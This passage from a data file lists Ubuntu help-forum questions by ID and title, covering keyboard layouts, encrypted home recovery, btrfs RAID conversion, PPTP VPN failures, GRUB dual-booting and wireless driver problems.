( 3 ) ] now , what i would like to do is to assign a different layout to the two `` chesen usb keyboard '' - one is the media keys , that i `` physically eliminated '' when assembling , whell , no matter - and leave the rest of the keyboards with the current layout ( spanish , with mute tilde ) . in particular , the logitech wireless k400 that i use as main keyboard/pointer ( that 's very comfy ) . oddly enough , i do not see the k400 keyboard in the xinput list , just an entry for the the logitech unifying device , listed as a pointer . so , as a test i tried to insert the command ~ $ setxkbmap -device 12 -layout us and , to be honest , it works as advertised ... but for the k400 . apparently , the k400 has no layout of her own ... it just uses the layout of the last keyboard that has been used . so , if i now press a key on the chesen , the logitech suddenly switches to a us layout ( with the ñ symbol replaced by a ; ) , only to revert to a spanish layout the moment i press a key on the sigmachip keyboard . what is happening here ? have i a way to fix the behaviour of the k400 ?
465490	automatically run xbmc at bootup in lubuntu	running a fresh install of lubuntu 14.04 , would like to have xbmc run at boot but i cant seem to find any system setting like that . any ideas where to look ?
465491	ecryptfs-recover-private with only mount passphrase gives encrypted filenames	i am trying to recover my encrypted home directory with ecryptfs-recover-private with only my mount passphrase . i do n't know my login passphrase . i changed my password using the passwd command , and now i ca n't get into my directory . i have successfully mounted and recovered the directory using both the mount and recover commands . in both cases my filenames remain encrypted . can someone help me through this last step of decrypting my filenames so i can save my data . thanks , damion
465493	how can i symlink my home folder from another drive ?	more specifically , i want to have the user folder for my home account another disk that has more space , but keep my other smaller accounts on my ssd . i was able to copy my user folder to another disk , but now i need to link it to the home folder on my ssd , i want it accessible from a normal boot , and please do n't tell me that what i did was not the best thing , i just want an answer . how do i get it to create a link that goes from /home/username to /extra-home/username and is recognised by the system when loading the user folders ?
465494	security problem - password not required after tying to active directory server	we have been using our ad server to authenticate ubuntu users for years . we have a handy perl script that places all the correct config files and does all the work for us . however , i 'm having a major issue with ubuntu 14.04 . here 's what happens : in install the system from scratch with a local user everything pertaining to the local user works fine i run my ad script : it installs these packages ( and dependencies ) : ntp , sssd , libnss-sss , libpam-sss , krb5-user it modifies these files : /etc/nsswitch.conf /etc/pam.d/common-session /etc/sssd/sssd.conf /etc/ldap/ldap.conf it places a certificate file in /etc/ssl/certs/ it modifies the lightdm config and adds this option : greeter-show-manual-login=true '' i reboot at the login prompt i type my ad username and hit enter i am then logged in - without being prompted for a password i have no idea how this is possible . is it some kind of bug ? if not , it seems like an issue with lightdm , or maybe one of the underlying authentication configs . please help me out . i can post the code of the modified config files if requested .
465496	folder icon without gvsf	i would like to change a folder icon using a command line in linux , but without use de gvsf . can anyone help me ? thanks ! !
465498	mounting usb does n't work	i have an acer c720 . i used the crouton method to get ubuntu and i do n't know how to get to certain logs and such to post about this problem . i put the flash drive in while lxde is running and it gives me the following error : http : //postimg.org/image/dfvt932vx/ i have seen other people posting things on how to work around this but nothing quite seems to fit the unique problems going on here . so first things first , what information will i need to post and how can i find it ? flash drive type : 32 gb ultra by sundisk , 29.8 gb usable update : mounting it manually has worked , thank you to those that have commented !
465501	bricked my computer , is there any way to get it back ?	i recently installed ubuntu , but grabbed the 32-bit by accident so i went back to windows , and was like better remove the ubuntu files , so i deleted that partition . i downloaded the 64-bit version and made it usb bootable . i proceeded to turn off my computer and plug in the usb to boot however i got the no such partition grub rescue message . i was like i am dumb half to tell it to boot from the usb , so i turned off my computer and spammed f2 to get into bios , but i was n't able to and the text that normally says press f2 to enter bios was gone . i am using the lenevo ideapad n585 laptop . i also ca n't boot off of cd because i remember the boot list went : hard drive external hard drive usb cd if possible i would like to keep files , but would n't mind resetting if necessary . another problem is that lenevo uses a one key recovery thing which requires windows to to be installed on a primary partition which i made logical to make a partition for ubuntu . please help . the warranty is out . nothing i found helps . i do have another computer i can use if necessary , but it is an old window xp computer .
465503	what process is used under the covers to load the ubuntu linux kernel ?	what particular steps take place behind the scenes to load and start the ubuntu linux kernel ?
465505	btrfs two data sections and enospc error when trying to convert	i currently have a btrfs filesystem setup on an ubuntu 14.04 setup like this : # btrfs fi df /storage/ data , raid1 : total=2.33tib , used=2.32tib data , raid0 : total=2.00gib , used=2.00gib system , raid1 : total=32.00mib , used=340.00kib metadata , raid1 : total=4.00gib , used=2.53gib and : # btrfs fi show label : none uuid : 5e63e5b5-48bb-442e-a79c-1c71a22de476 total devices 3 fs bytes used 2.33tib devid 1 size 2.73tib used 1.56tib path /dev/sda devid 2 size 2.73tib used 1.56tib path /dev/sdd devid 3 size 2.73tib used 1.55tib path /dev/sdc btrfs v3.12 as you can see i have two data sections , one with most of my data in raid1 and another one , 2gib large , with raid0 configuration . i want to end up will all of my data in raid1 . i have tried balancing the whole /storage/ filesystem , i have tried , as suggested in another question , the command btrfs balance start -dprofiles=raid0 -dconvert=raid1 /storage/ to convert just the raid0 part to raid1 . however , this is the result : # btrfs balance start -dprofiles=raid0 -dconvert=raid1 /storage/ error : error during balancing '/storage/ ' - no space left on device there may be more info in syslog - try dmesg | tail checking the syslog as suggested yields : [ 432205.142548 ] qnx4 filesystem 0.2.3 registered . [ 480205.124621 ] btrfs : relocating block group 4968366997504 flags 9 [ 480205.286706 ] btrfs : 1 enospc errors during balance
465507	ubuntu 14.04 dell e7240 - docked - does n't recognize second monitor	i have the same problem as the post below . ubuntu 14.04 and dell latitude e5540 multiple monitors not working system : dell e7240 video : intel haswell dock : dell monitors : 2 x dvi dell 19in wide the screens are on and both get a signal . one monitor replicates the other . it seems that ubuntu does n't recognize that their are 2 monitors . any help with how to resolve this would be much appreciated . thx lspci | grep vga 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 0b ) xrandr -- query screen 0 : minimum 8 x 8 , current 1440 x 900 , maximum 32767 x 32767 edp1 connected ( normal left inverted right x axis y axis ) 1366x768 60.0 + 40.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 connected primary 1440x900+0+0 ( normal left inverted right x axis y axis ) 408mm x 255mm 1440x900 59.9*+ 75.0 2560x1024 60.0 2880x900 60.0 1280x1024 75.0 60.0 1280x800 59.8 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 75.0 72.8 66.7 60.0 720x400 70.1 hdmi2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis )
465508	juju bootstrap -- debug failed to connect https : //streams.canonical.com	how can i fix this case , my condition : maas server on vm juju in main server all ubuntu 14.04 here is the error curl ( 6 ) `` could not resolve host : streams.canonical.com '' setting up libboost-program-options1.54.0 : amd64 ( 1.54.0-4ubuntu3 ) ... setting up libboost-thread1.54.0 : amd64 ( 1.54.0-4ubuntu3 ) ... setting up libpcrecpp0 : amd64 ( 1:8.31-2ubuntu2 ) ... setting up libunwind8 ( 1.1-2.2ubuntu3 ) ... setting up libtcmalloc-minimal4 ( 2.1-2ubuntu1 ) ... setting up libgoogle-perftools4 ( 2.1-2ubuntu1 ) ... setting up libsnappy1 ( 1.1.0-1ubuntu1 ) ... setting up juju-mongodb ( 2.4.9-0ubuntu3 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... curl : ( 6 ) could not resolve host : streams.canonical.com tools from https : //streams.canonical.com/juju/tools/releases/juju-1.18.3-trusty-amd64.tgz downloaded : http 000 ; time 9.523s ; size 0 bytes ; speed 0.000 bytes/s error bootstrap failed : rc : 1 stopping instance ... bootstrap failed , destroying environment error rc : 1 i added all dns server ip in /etc/network/interface as dns-nameservers 192. ? . ? ? 10.0. ? ? and the error changed to processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... curl : ( 7 ) failed to connect to streams.canonical.com port 443 : connection refused i can ping the streams.canonical.com , i think there is some thing wrong with ssl certification ! do i have to set some thing about ssl certification on my juju or maas server ? ! i tried to juju boot strap from vm machine as juju server i got this : error bootstrap failed : can not upload bootstrap tools : juju can not bootstrap because no tools are available for your environment . you may want to use the 'tools-metadata-url ' configuration setting to specify the tools location . i tried to juju boot strap from vm machine as juju server i got this : error bootstrap failed : can not upload bootstrap tools : juju can not bootstrap because no tools are available for your environment . you may want to use the 'tools-metadata-url ' configuration setting to specify the tools location .
465509	pptp does n't connect - 12.04 , 13.10 , 14.04	currently tested on ubunutu 14.04 , 13.10 , and 12.04 , i 'm trying to connect to my vpn provider using pptp . i 've followed various instructions including the ones given to me by my provider only for them not to work . on a fresh install of ubuntu i run the following ( the usual bits ) : apt-get install network-manager-pptp pptp-linux afterwards i fill in the usual config in network manager , including enabling mppe . my vpn attempts to connect but in the end fails . this is what my syslog looks like before and after trying to connect . to make sure my vpn provider and creds work i 've tested on my mac without issue . what is it i 'm doing wrong ? any help is appcrieated . may 13 18:53:28 user-virtualbox networkmanager [ 688 ] : < info > starting vpn service 'pptp ' ... may 13 18:53:28 user-virtualbox networkmanager [ 688 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 1530 may 13 18:53:28 user-virtualbox networkmanager [ 688 ] : < info > vpn service 'pptp ' appeared ; activating connections may 13 18:53:28 user-virtualbox networkmanager [ 688 ] : < info > vpn plugin state changed : init ( 1 ) may 13 18:53:28 user-virtualbox networkmanager [ 688 ] : < info > vpn plugin state changed : starting ( 3 ) may 13 18:53:28 user-virtualbox networkmanager [ 688 ] : < info > vpn connection 'vpn connection 1 ' ( connect ) reply received . may 13 18:53:28 user-virtualbox pppd [ 1532 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . may 13 18:53:28 user-virtualbox pppd [ 1532 ] : pppd 2.4.5 started by root , uid 0 may 13 18:53:28 user-virtualbox pppd [ 1532 ] : using interface ppp0 may 13 18:53:28 user-virtualbox pppd [ 1532 ] : connect : ppp0 < -- > /dev/pts/3 may 13 18:53:28 user-virtualbox pptp [ 1537 ] : nm-pptp-service-1530 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated may 13 18:53:28 user-virtualbox networkmanager [ 688 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) may 13 18:53:28 user-virtualbox networkmanager [ 688 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . may 13 18:53:28 user-virtualbox pptp [ 1543 ] : nm-pptp-service-1530 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' may 13 18:53:28 user-virtualbox pptp [ 1543 ] : nm-pptp-service-1530 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply may 13 18:53:28 user-virtualbox pptp [ 1543 ] : nm-pptp-service-1530 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . may 13 18:53:29 user-virtualbox pptp [ 1543 ] : nm-pptp-service-1530 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' may 13 18:53:29 user-virtualbox pptp [ 1543 ] : nm-pptp-service-1530 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . may 13 18:53:29 user-virtualbox pptp [ 1543 ] : nm-pptp-service-1530 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 35968 ) . may 13 18:53:59 user-virtualbox pppd [ 1532 ] : lcp : timeout sending config-requests may 13 18:53:59 user-virtualbox pppd [ 1532 ] : connection terminated . may 13 18:53:59 user-virtualbox networkmanager [ 688 ] : < warn > vpn plugin failed : 1 may 13 18:53:59 user-virtualbox networkmanager [ 688 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) may 13 18:53:59 user-virtualbox pppd [ 1532 ] : modem hangup may 13 18:53:59 user-virtualbox pptp [ 1537 ] : nm-pptp-service-1530 warn [ decaps_hdlc : pptp_gre.c:204 ] : short read ( -1 ) : input/output error may 13 18:53:59 user-virtualbox pptp [ 1537 ] : nm-pptp-service-1530 warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log may 13 18:53:59 user-virtualbox networkmanager [ 688 ] : < warn > vpn plugin failed : 1 may 13 18:53:59 user-virtualbox pppd [ 1532 ] : exit . may 13 18:53:59 user-virtualbox networkmanager [ 688 ] : < warn > vpn plugin failed : 1 may 13 18:53:59 user-virtualbox networkmanager [ 688 ] : < info > vpn plugin state changed : stopped ( 6 ) may 13 18:53:59 user-virtualbox networkmanager [ 688 ] : < info > vpn plugin state change reason : 0 may 13 18:53:59 user-virtualbox pptp [ 1543 ] : nm-pptp-service-1530 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) may 13 18:53:59 user-virtualbox pptp [ 1543 ] : nm-pptp-service-1530 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' may 13 18:53:59 user-virtualbox pptp [ 1543 ] : nm-pptp-service-1530 log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) may 13 18:53:59 user-virtualbox networkmanager [ 688 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . may 13 18:53:59 user-virtualbox networkmanager [ 688 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . may 13 18:54:04 user-virtualbox networkmanager [ 688 ] : < info > vpn service 'pptp ' disappeared
465510	gpt talbe corrupt after raid1 setup	so i 'm completely new to ubuntu and am trying to set up a backup/media server at home . i saw the guide on lifehacker and figured i 'd give it a try . my system is an i3 3225 on an intel dh77df mobo with 8gb of ram . there 's a 64gb msata ssd as the boot drive and two 4tb wd red drives for the raid1 configuration . i installed ubuntu 14.04 lts in uefi mode on the ssd without issues but as soon as i create the software raid1 ( and it finishes syncing after 9 hours ) , gparted gives me the following errors : libparted bug found ! end of file while reading invalid argument the primary gpt table is corrupt , but the backup appears ok , so that will be used . these appear twice as almost for each 4tb drive . am i doing something wrong when creating the raid ? the raid also appears as md127 if that helps . thanks , mark ps - this raid setup has been a huge pain so far and i could write a good rant but i 'll refrain for now . for example , mdadm was n't initially installed so i had to figure that out . this was also after the fact i found out bios raid is really fakeraid .
465512	wget inside chroot - can not verify certificate ?	i 'm trying to install some packages into a chroot and when getting the key i get these errors : root @ devpc : / # wget -o- 'https : //ceph.com/git/ ? p=ceph.git ; a=blob_plain ; f=keys/release.asc' -- 2014-05-13 22:59:18 -- https : //ceph.com/git/ ? p=ceph.git ; a=blob_plain ; f=keys/release.asc resolving ceph.com ( ceph.com ) ... 208.113.241.137 , 2607 : f298:4:147 : :b05 : fe2a connecting to ceph.com ( ceph.com ) |208.113.241.137|:443 ... connected . error : can not verify ceph.com 's certificate , issued by '/c=gb/st=greater manchester/l=salford/o=comodo ca limited/cn=positivessl ca 2 ' : unable to locally verify the issuer 's authority . to connect to ceph.com insecurely , use ` -- no-check-certificate ' . i 've tried copying the /etc/ssl folder across but that did n't resolve it . neither did installing ssl-cert . how do i resolve this ?
465515	getting an odd message when searching in browser 's address bar	so i searched adblock in the firefox address bar and it redirected to a page `` http : //domainnotfound.optimum.net/cablevassist/dnsassist/main/ ? domain=adblock '' that said : server error in '/ ' application . runtime error description : an application error occurred on the server . the current custom error settings for this application prevent the details of the application error from being viewed remotely ( for security reasons ) . it could , however , be viewed by browsers running on the local server machine . details : to enable the details of this specific error message to be viewable on remote machines , please create a < customerrors > tag within a `` web.config '' configuration file located in the root directory of the current web application . this < customerrors > tag should then have its `` mode '' attribute set to `` off '' . < ! -- web.config configuration file -- > < configuration > < system.web > < customerrors mode= '' off '' / > < /system.web > < /configuration > notes : the current error page you are seeing can be replaced by a custom error page by modifying the `` defaultredirect '' attribute of the application 's < customerrors > configuration tag to point to a custom error page url . i 'm just trying to use ubuntu for basic browsing . nothing that would cause a message that says there 's some server error and custom server settings ( which a browser on the network should be able to see but i ca n't even though my browser is on my home network .
465521	dual-booting ubuntu with refind from an external hdd on a macbook pro	i 'm dual-booting a late-2013 macbook pro with ubuntu 14.04 x64 ( vmlinuz-3.13.0-24-generic ) and osx 10.9.2 with refind . this worked well after i installed refind 's ext4 driver . i also have the hard-drive from my previous laptop on a usb external drive with copies of windows and ubuntu on separate partitions which i 'd like to boot on the mac . i can mount these partitions on osx or ubuntu , but as refind did n't recognise the installations i used gdisk to change the disk to gpt . after that , refind recognised the existence of the external ubuntu and windows installations , but does n't give any information about the kernel and shows a penguin icon for ubuntu . trying to boot this leads to a pause then a blank screen with the message : no bootable device - insert boot disk and press any key i added a stanza in refind.conf referring to ubuntu by uuid , and i added a refind_linux.conf to the boot folder in the ubuntu 13.04 x64 partition on the external drive , but this made no difference : '' boot x64 13.04 with standard options '' `` ro root=31b998f7-0607-40f3-ba7f-67f297d79a2d quiet splash '' can anyone suggest where i 've gone wrong , or how to get it working ? thanks .
465523	my wireless connection seems to be ok , but there 's no internet	i am connected to my router ( wireless ) but mozilla and all internet applications does n't work like without internet . ubuntu 12.04 lts
465526	bluetooth and speaker occasionally working on asus n550jv	i use a asus n550jv laptop with ubuntu 14.04 and windows 8 dual boot . the bluetooth module is atheros ar3012 . since the day ubuntu is installed , the behavior of bluetooth and speaker is weird . they are not totally dead . they sometimes work , but i find no pattern about when they work and when they do n't . sometimes bluetooth works right after start up . in other time , the bluetooth icon does not show up in menu bar ( i have `` show bluetooth status shown in menu bar '' checked in settings ) . when i enter settings , bluetooth is shown to be off . even though i can set it to on by clicking it , the device menu below still shows `` bluetooth is disabled '' and i can not search and add device ( i use a bluetooth mouse ) . also , if i close the settings and open it again , bluetooth will be set to off again . the same is with the speaker . sometimes it works right after startup but sometimes it just refuse to work . i am so confused . could anyone tell me how to solve this problem ? thanks in advance . p.s . every time i start up , at the page where i enter my password to log in , it always pops up a window titled `` authentication required by wi-fi network '' and asks me for wifi password . but even if i type in the password , the connect button is still grayed out . does this has anything to do with the problems above ? edit : i checked /var/log/dmesg and the error about bluetooth is as follow : [ 5.032070 ] bluetooth : error in firmware loading err = -110 , len = 448 , size = 1184 [ 5.032126 ] bluetooth : loading sysconfig file failed [ 5.032166 ] ath3k : probe of 3-5:1.0 failed with error -110
465531	how to make a shell file execute by double click	i have tried right clicking on the file selecting properties and then the permissions tab and setting it to execute . however , when i double click the file it opens in gedit . what do i do ?
465532	what is bashrc and why do i need to put dot infront of some executable in order to execute it ?	what is bashrc i know files/folders with dot meaning they are hidden , but why do i need to put dot to execute the green files coming from ms dos , linux seems to be very difficult to learn , where can i access usb drives , cd roms and such ?
465534	trying to add windows 7 to grub2	so i just got a ssd that i installed ubuntu 14.04 on . i did this by using a disk . for some reason it would not allow me to install it from windows 7 . so right now i have to go into my bios to switch between the two os . i would like to add windows 7 to grub instead of messing with my windows boot loader . i have downloaded the bootinfoscript and run it and this is what i get : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . = > windows is installed in the mbr of /dev/sdb . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdc and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 112 for . sda1 : __________________________________________________________________________ file system : vfat boot sector type : windows 7 : fat32 boot sector info : no errors found in the boot parameter block . operating system : boot files : /efi/boot/bootx64.efi sda2 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe sdb1 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' mount : unknown filesystem type '' sdb2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : according to the info in the boot sector , sdb2 has 1565300735 sectors , but according to the info from fdisk , it has 2639042559 sectors . operating system : boot files : sdc1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 14.04 lts boot files : /boot/grub/grub.cfg /etc/fstab sdc2 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sdc5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 120.0 gb , 120034123776 bytes 256 heads , 63 sectors/track , 14536 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 4,294,967,295 4,294,967,295 ee gpt /dev/sda1 ends after the last sector of /dev/sda guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 206,847 204,800 efi system partition /dev/sda2 206,848 468,991 262,144 microsoft reserved partition ( windows ) /dev/sda3 468,992 234,440,703 233,971,712 data partition ( windows/linux ) drive : sdb _____________________________________________________________________ disk /dev/sdb : 3000.6 gb , 3000592982016 bytes 256 heads , 63 sectors/track , 363376 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 1 4,294,967,295 4,294,967,295 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sdb1 34 262,177 262,144 microsoft reserved partition ( windows ) /dev/sdb2 264,192 2,639,306,751 2,639,042,560 data partition ( windows/linux ) drive : sdc _____________________________________________________________________ disk /dev/sdc : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdc1 * 2,048 29,106,175 29,104,128 83 linux /dev/sdc2 29,108,222 62,531,583 33,423,362 5 extended /dev/sdc5 29,108,224 62,531,583 33,423,360 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 eab6-626e vfat /dev/sda3 4042b74842b74208 ntfs /dev/sdb2 7c8c238f8c23434e ntfs main drive /dev/sdc1 dcb7aad1-97d3-4eeb-9e03-ea1f544733ab ext4 /dev/sdc5 f25dc0ba-dd80-4a39-8c60-56deb926b6b6 swap ================================ mount points : ================================= device mount_point type options /dev/sdc1 / ext4 ( rw , errors=remount-ro ) =========================== sdc1/boot/grub/grub.cfg : =========================== how do i go about adding it ?
465541	i ca n't run flashtool on ubuntu-gnome 14.04	i try to run flashtool 0.9.16 on ubuntu-gnome 14.04 but if i run as root then it return this error gelasak @ gelasak-ga-ma785gt-ud3h : ~/flashtool $ sudo ./flashtool running as root . java_home not set . using default value : ./x10flasher_lib/linjre64 java version must be 1.6 or 1.7 gelasak @ gelasak-ga-ma785gt-ud3h : ~/flashtool $ i have read this solution how do i install libusbx library and i have set the java_home but this happens only if i run flasttool as root . if i run it without root privileges then flashtool gui run well but i have this error not running as root but sony/sonyericcson vendor id found on your udev rules if flashing did n't work well , run flashtool as root open : access error . no permission on device open : access error . no permission on device open : access error . no permission on device that i had never have before on ubuntu-gnome 13.10 and with older version of flashtool . so i think that the problem comes from ubuntu or new version of flashtool . can you help me ? sorry for my bad english .
465542	install libgluezilla & create .desktop in kubuntu 14.04	first question : how to install libgluezilla ? i have installed wine and try to run an .exe , but it says 'libgluezilla not found . to have webbrowser support , you need libgluezilla installed ' . then , i run this command 'sudo apt-get install libgluezilla ' and package libgluezilla is not available . second question : how can i make a .desktop file instead of creating widgets ? in linux mint 16 kde when i right click program in application launcher > add to desktop , it automatically creates a .desktop file , but in kubuntu 14.04 , it creates a widget .
465544	why do i see a cron session opening and closing every hour in /var/log/auth.log ?	i am quite fresh with linux as a whole , so this may be a silly question - but i would still like to know the answer this morning when i look at my /var/log/auth.log ( which i 've been told to make a habit ) i notice that once an hour it has logged an event that looks like this : may 13 20:17:01 ubuntu-server-1401-vm cron [ 2280 ] : pam_unix ( cron : session ) : session opened for user root by ( uid=0 ) may 13 20:17:01 ubuntu-server-1401-vm cron [ 2280 ] : session closed for user root it has then proceeded to happen every hour at x:17:01 until i opened the log . an ssh connection to this server has been kept alive during this time ( where the log entires occured ) . my best guess is that every hour my ssh client has looked to see whether or not it could obtain root access as a way to verify the connection to the ssh connection to the server - but i would like to be on the safe side . does anyone know what this is ?
465547	ptrace-scope is unaccessible	when installing ubuntu 14.04 the following message came up when some component install seemed to go awry : if install fails set /proc/sys/kernel/yama/ptrace-scope to 0 i have tried editing the file in question by means of : sudo gedit /proc/sys/kernel/yama/ptrace-scope then copy the file to /home/myname/documents , edit it , which works fine there . and then try to mv it back , without luck . each time it comes up that the file does not exist . no doubt there is a simple solution for this , and any help in getting around whatever is blocking this would be appreciated .
465548	set up windows on a workspace	i 'd like to set up a command that can restore all of my windows after a reboot . i typically have a set of windows per workspace ( multiple monitors ) for a particular task . after i reboot ( which is more frequent now because apparently ssds are n't supposed to hibernate ) i set each of these workspaces up . ideally i could run something like : ./restorewindows 1 work ./restorewindows 2 play the first command would `` restore windows '' on workspace # 1 for the `` work '' profile , which i 'd define ahead of time as : terminal on screen 1 occupying left half of screen started in directory workproject terminal on screen 1 occupying right half of screen started in directory workproject running command grunt chrome/chromium browser on screen 2 [ with tabs ] terminal and chrome/chromium are pretty much all i need restored . i 'd also settle for something that restored windows of a particular profile on the current desktop : ./restoredesktop work # restores on active workspace
465550	`` can not compile without isnan function or macro '' when trying to compile geos on 14.04	using a procedure for building geos on ubuntu 12.04 , i 'm trying to build geos on 14.04 and get the error , `` can not compile without isnan function or macro '' when make is executed . sudo apt-get -y install build-essential wget http : //download.osgeo.org/geos/geos-3.4.2.tar.bz2 tar xvfj geos-3.4.2.tar.bz2 cd geos-3.4.2 ./configure make for some reason the isnan ( ) macro does n't seem to be available on 14.04 , how can i get this to compile ?
465551	broadcom b4311 drivers installed and non-functional	just did a clean install of ubuntu 14.04 on an hp laptop with a broadcom 4311 wireless card . i 've installed the following packages in an attempt to find the driver for it . b43-fwcutter firmware-b43-installer linux-firmware-nonfree the wireless card worked fine in ubuntu 13.10 , but in ubuntu 14.04 it does n't even show up in the network manager , and toggling the hardware switch does n't do anything . i installed `` sysinfo '' and it properly identifies the wireless card model , but for some reason installing the driver does n't seem to have gotten it to work . i 've done some searching for various wireless tutorials , but most of them seem to pertain to helping people find a driver . i 've got the driver , it 's the same one i used in the previous version of ubuntu , it just is n't working any more , : - (
465554	setting up a virtual samba server ( guest os is ubuntu , host is windows 7 )	ok , i know this is an incredibly basic question and has no doubt been asked many times before - although i ca n't for the life of me find instructions that exactly mirror my scenario : i 'm running windows 7 as a host os , and a vm ( virtualbox ) running ubuntu 12.04 server as a guest . the whole point of running ubuntu was to run a virtual file server for my wife and me while running a media server through windows 7 . where do i start ? ? ? ? help ! ! ! i 'm a complete beginner ... also , i want to use a 1tb or 500gb hdd for data storage - and connect it via windows 7 , i.e . outside the vm . thanks !
465555	14.04 hangs on shutdown	just installed ubuntu 14.04 on this hp laptop and it seems to be hanging on shutdown . removed `` quiet '' and `` splash '' from the boot line so i could get a verbose shutdown . when it gets to `` will now halt '' , it just sits there . i ca n't seem to find a log that contains these shutdown messages or i would include it . i 've checked /var/log/syslog and /var/log/kern.log and they do n't contain any shutdown information . i 've tried doing an `` updatedb '' and doing a search for the words `` will now halt '' but nothing comes up . the `` fail '' in the image below appears to be coming from `` killing all remaining processes '' .
465556	can no longer open multiple vlc players	since upgrading to 14.04 i seem to be limited to one vlc player only ? ! ? ( went slowly up each upgrade from 12.04 )
465557	creating a virtual machine with an existing vhd file via command line with command line	i have a .vhd ( an ubuntu server instance ) file that i 'd like to run on ubuntu server 14.04 with bridged networking . how can i set its network interface and boot from it using only the command line ?
465558	broadcom bcm4313 wifi slow after upgrade to ubuntu 14.04	i 'm afraid this is another question about broadcom wifi ( in particular , the bcm4313 chipset ) . before upgrading to 14.04 , my wifi worked perfectly . since upgrading , it has been working only very slowly , and occasionally not at all . i am currently running the brcmsmac driver , which the official documentation , as well as many of the answers in the links below , suggest is the right one for my kernel version and chipset . i have pasted the wireless info from my computer ( including lspci , iwconfig , iwlist , lsmod , etc . ) here : http : //pastebin.com/5fhwiwi0 . i appreciate that problems such as mine seem to be widespread . here are some of the similar questions i 've found on these forums : extremely slow connection with a broadcom bcm4313 wireless card can not connect to wifi after upgrade to 13.10 ( bcm4313 ) broadcom bcm4313 ubuntu 13.10 connection time out wireless problems with broadcom bcm4313 how do i get a broadcom bcm4313 wireless card working ? 13.10 bcm4313 network problems after update however , none of the answers contained therein worked/applied in my case . edit : i should have mentioned that i have also tried using bcmwl-kernel-source . this works better than bcrcmsmac ( but not perfectly ) on one of the two wifi networks that i regularly use , but it wo n't even allow me to connect to the other one .
465559	recently installed ubuntu 14.04 but continues to restart laptop	i 've been trying to run ubuntu 14.04 off a usb on my win 8.1 laptop . i get the dual boot os selection screen on startup but each time i select ubuntu , the system restarts . i got the same result trying to run it off a live cd . what did i failed to do ?
465565	ubuntu 14 upstart , script never runs -- no log file	i apologize ahead of time if this has been answered , but ive looked through all the other questions and havent found anything that helps . here is my upstart script : nodeapps.conf start on [ 2345 ] forever start -- spinsleeptime 10000 /home/nodeapps/node_app.js forever start -- spinsleeptime 10000 /home/nodeapps/node_metrix.js when i reboot , i call forever list to see anything running . nothing shows up . the other answers i have seen suggest looking in /var/log/upstart , but there is no log for nodeapps . i have tried start on startup , and start on [ 2345 ] am i missing something obvious ? i created the file in /etc/init/ , using nano . edit : i should note , this is ubuntu 14 through a vps , i only have console access , no gui .
465568	how to do build a 64-bit develop environment in ubuntu 12.04 lts 32-bit ?	i using the ubuntu 12.04.4 lts 32-bit . but now , i want to build 64-bit binaries & packages as same source of ubuntu 12.04.4 lts 32-bit on it . i think that , if i use clfs ( cross linux from scratch ) technology , i can do it . but i do n't know the way how to use clfs and where is the clfs tool . normally , if i build binaries & packages on my system , it products one related with 32-bit . how to change it for 64-bit ?
